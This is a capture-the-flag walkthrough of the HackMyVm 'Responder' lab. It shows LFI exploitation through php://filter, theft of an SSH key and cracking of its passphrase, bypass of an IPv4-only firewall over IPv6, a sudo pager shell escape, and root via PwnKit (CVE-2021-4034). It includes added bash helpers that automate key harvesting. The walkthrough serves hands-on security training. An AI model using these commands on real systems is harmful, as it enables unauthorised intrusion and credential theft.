HackMyVm Responder Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Responder
Scan the ports. Port 22 shows as filtered: nmap gets no reply at all (a firewall drops the probes) rather than the RST a closed port sends back.
nmap -sV -sC -oN port.log 192.168.56.100
Nmap scan report for darkmatter.hmv (192.168.56.100)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Check port 80: the only page is a plain one that prints the current time.
~/D/responder $curl 192.168.56.100
your answer is in the answer.. it's
01:46
and your time is running out..
Brute-force directories on port 80 and find filemanager.php. A high thread count does not work against this box, so it is set to 20.
~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 200) [Size: 73]
/filemanager.php (Status: 302) [Size: 0] [--> /]
Fuzz the parameter name of filemanager.php (--hh 0 hides the empty responses). The only hit is random; the 302 still carries a 1430-byte body, so the included file is returned before the redirect.
~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003395: 302 27 L 39 W 1430 Ch "random"
The LFI works. Reading /etc/passwd gives two user names with login shells.
~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash
After enumerating some system files, none of the log files give a way to a shell (no log poisoning). Instead, read the source of filemanager.php itself through the php://filter wrapper: base64-encoding the file stops include() from executing the PHP and returns it as text, which is decoded locally. The source carries an SSH private key in a comment.
~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-encode/resource=filemanager.php" |base64 -d
...
<?php
$filename = $_GET['random'];
include($filename);
header('Location:/');
/*
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4
XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
...
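Pulling the key out of the disclosed source by hand is easy to get wrong (one stray character breaks the PEM). The shell helper below is an added example written for this walkthrough, not code from the original page: it base64-decodes a php://filter response, cuts out the PEM block, saves it with the 0600 mode ssh insists on, and reports whether the key is passphrase-protected, which is what decides whether the ssh2john step is needed. The blob it runs on is a constructed stand-in for the real response (the page shows the key only in part, and the body lines below are placeholder text, not key material); lfi_fetch_b64 wraps the curl request from the page and is only there for live use, it is not exercised offline.

```bash
#!/usr/bin/env bash
# Added example: harvest an SSH private key from PHP source disclosed via
# php://filter/convert.base64-encode. Not part of the original walkthrough.

# Live wrapper around the request used on the page (hypothetical helper, not run here).
lfi_fetch_b64() {
  local target="$1" file="$2"
  curl -s "http://${target}/filemanager.php?random=php://filter/convert.base64-encode/resource=${file}"
}

# Base64-decode stdin and print only the PEM private-key block.
# Matches RSA, OPENSSH and PKCS#8 headers; strips CRs so the $ anchors hold
# on CRLF output; returns 1 if there is no key in the decoded text.
extract_pem() {
  base64 -d 2>/dev/null \
    | tr -d '\r' \
    | sed -n '/^-----BEGIN [A-Z ]*PRIVATE KEY-----$/,/^-----END [A-Z ]*PRIVATE KEY-----$/p' \
    | grep . || return 1
}

# Legacy PEM keys mark a passphrase with a Proc-Type: 4,ENCRYPTED header;
# new-style OpenSSH keys encode this differently and are not detected here.
pem_is_encrypted() {
  grep -q '^Proc-Type: 4,ENCRYPTED'
}

# Write stdin to a key file that only the owner can read (ssh rejects
# group- or world-readable private keys).
save_key() {
  local out="$1"
  ( umask 077; cat > "$out" )
  chmod 600 "$out"
}

# Decode, cut out the key, save it and say whether john is needed next.
harvest_key() {
  local b64="$1" out="$2" pem
  pem=$(printf '%s' "$b64" | extract_pem) || { echo "no private key in decoded source" >&2; return 1; }
  printf '%s\n' "$pem" | save_key "$out"
  if printf '%s\n' "$pem" | pem_is_encrypted; then
    echo "saved $out: passphrase-protected, run ssh2john + john"
  else
    echo "saved $out: no passphrase"
  fi
}

# Constructed stand-in for the php://filter response (the body lines are
# placeholder text, not key material; the DEK-Info salt is zeroed).
SAMPLE_B64=$(base64 <<'EOF' | tr -d '\n'
<?php
$filename = $_GET['random'];
include($filename);
header('Location:/');
/*
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0000000000000000
PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPL
PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPL
-----END RSA PRIVATE KEY-----
*/
EOF
)

harvest_key "$SAMPLE_B64" ./id_rsa.sample
```

Against a live target the same flow is `lfi_fetch_b64 192.168.56.100 filemanager.php | extract_pem | save_key id_rsa`; the encrypted check is what tells you the key is useless without the passphrase cracked in the next step.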
The key is passphrase-protected (Proc-Type: 4,ENCRYPTED), so crack the passphrase with john: convert the key with ssh2john, then run it against rockyou.
~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt
~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
...
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (id_rsa)
We now have user names, the key and its passphrase for SSH, but 22/tcp is filtered over IPv4. Firewall rules are often written for IPv4 only, so the port may still be reachable over IPv6.
Find the machine's IPv6 address by pinging the all-nodes link-local multicast group ff02::1 on eth1; every host on the link answers with its link-local address.
~/D/responder $ping6 -c2 -n -I eth1 ff02::1
ping6: Warning: source address might be selected on device other than: eth1
PING ff02::1(ff02::1) from :: eth1: 56 data bytes
...
64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
...
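The ff02::1 ping works because the target shares a link with us. When that multicast probe is blocked, the link-local address can often be derived instead: the address above, fe80::a00:27ff:fec2:1426, is the modified EUI-64 form of the MAC 08:00:27:c2:14:26 (a VirtualBox OUI), i.e. the MAC with ff:fe inserted between its two halves and the universal/local bit of the first octet flipped. The helper below is an added example written for this walkthrough, not code from the original page: it computes that address from a MAC, appends the %interface zone that link-local addresses need, and reverses the mapping so a MAC (and so a vendor) can be read off any reply to the ping. Hosts that use RFC 7217 stable-privacy addresses do not follow this scheme and still have to be found with the multicast ping. The target_mac function assumes the `ip neigh` output format and an existing IPv4 ARP entry; it is not exercised offline.

```bash
#!/usr/bin/env bash
# Added example: convert between a MAC address and the modified EUI-64 IPv6
# link-local address built from it. Not part of the original walkthrough.

# Hypothetical live helper (not run here): MAC of an IPv4 neighbour from the
# neighbour cache, assuming the "<ip> dev <if> lladdr <mac> <state>" format.
target_mac() {
  ip neigh show "$1" | awk '/lladdr/ { print $5; exit }'
}

# MAC -> fe80::<eui64>[%zone]. Returns 1 on a malformed MAC.
mac_to_linklocal() {
  local mac="$1" zone="${2:-}" o1 o2 o3 o4 o5 o6 g1 g2 g3 g4
  printf '%s' "$mac" | grep -Eqi '^([0-9a-f]{2}:){5}[0-9a-f]{2}$' || return 1
  IFS=: read -r o1 o2 o3 o4 o5 o6 <<EOF
$mac
EOF
  # Modified EUI-64: flip the universal/local bit (0x02) of the first octet and
  # insert ff:fe between the OUI and the device half, then group into 16 bits.
  g1=$(( ((0x$o1 ^ 0x02) << 8) | 0x$o2 ))
  g2=$(( (0x$o3 << 8) | 0xff ))
  g3=$(( 0xfe00 | 0x$o4 ))
  g4=$(( (0x$o5 << 8) | 0x$o6 ))
  # %x drops leading zeros per group, the same text form nmap and ssh print.
  # The %zone suffix is required when connecting to a link-local address.
  printf 'fe80::%x:%x:%x:%x%s\n' "$g1" "$g2" "$g3" "$g4" "${zone:+%$zone}"
}

# fe80::<eui64>[%zone] -> MAC, e.g. to identify the vendor of a host that
# answered the ff02::1 ping. Returns 1 if the address is not EUI-64 shaped.
linklocal_to_mac() {
  local addr rest g1 g2 g3 g4
  addr=$(printf '%s' "$1" | cut -d% -f1)        # drop a "%eth1" zone if present
  rest="${addr#fe80::}"
  [ "$rest" != "$addr" ] || return 1
  printf '%s' "$rest" | grep -Eqi '^[0-9a-f]{1,4}(:[0-9a-f]{1,4}){3}$' || return 1
  IFS=: read -r g1 g2 g3 g4 <<EOF
$rest
EOF
  # EUI-64 always has ff in the low byte of group 2 and fe in the high byte of group 3.
  [ $(( 0x$g2 & 0xff )) -eq 255 ] && [ $(( 0x$g3 >> 8 )) -eq 254 ] || return 1
  printf '%02x:%02x:%02x:%02x:%02x:%02x\n' \
    $(( (0x$g1 >> 8) ^ 0x02 )) $(( 0x$g1 & 0xff )) $(( 0x$g2 >> 8 )) \
    $(( 0x$g3 & 0xff )) $(( 0x$g4 >> 8 )) $(( 0x$g4 & 0xff ))
}

# Demo on the address seen in the ping6 output above.
mac_to_linklocal 08:00:27:c2:14:26 eth1
linklocal_to_mac fe80::a00:27ff:fec2:1426%eth1
```

On the box's network the two steps chain as `mac_to_linklocal "$(target_mac 192.168.56.100)" eth1`, which gives the address to hand to nmap -6 and ssh -6 without any IPv6 discovery traffic.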
Check port 22 over IPv6: it is open. The %eth1 zone suffix is required because link-local (fe80::/10) addresses are only meaningful per interface.
~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
Nmap scan report for fe80::a00:27ff:fec2:1426
Host is up (0.0097s latency).
PORT STATE SERVICE
22/tcp open ssh
Log in over SSH as elliot with the key and the cracked passphrase (-6 forces IPv6).
~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6
Enter passphrase for key 'id_rsa':
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)
Check sudo -l: elliot may run /usr/bin/calc as rohit without a password.
elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Temporary failure in name resolution
Matching Defaults entries for elliot on responder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elliot may run the following commands on responder:
(rohit) NOPASSWD: /usr/bin/calc
Run calc as rohit and open the help page. The help text is displayed through a pager; at the pager's ":" prompt type !/bin/bash and it spawns a shell running as rohit.
elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Temporary failure in name resolution
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type: help copyright
[Type "exit" to exit, or "help" for help.]
; help
...
For more information while running calc, type help followed by one of the
following topics:
topic description
----- -----------
intro introduction to calc
overview overview of calc
help this file
...
!/bin/bash
...
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)
List the SUID binaries as elliot. pkexec (polkit) stands out.
elliot@responder:~$ find / -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
Exploit the pkexec local privilege escalation CVE-2021-4034 (PwnKit) to get root. Note the prompt: the PoC is compiled and run as elliot, so the calc/rohit step above is not needed for this path; pkexec is SUID root and any local user can trigger the bug.
elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
elliot@responder:/tmp$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),1001(elliot)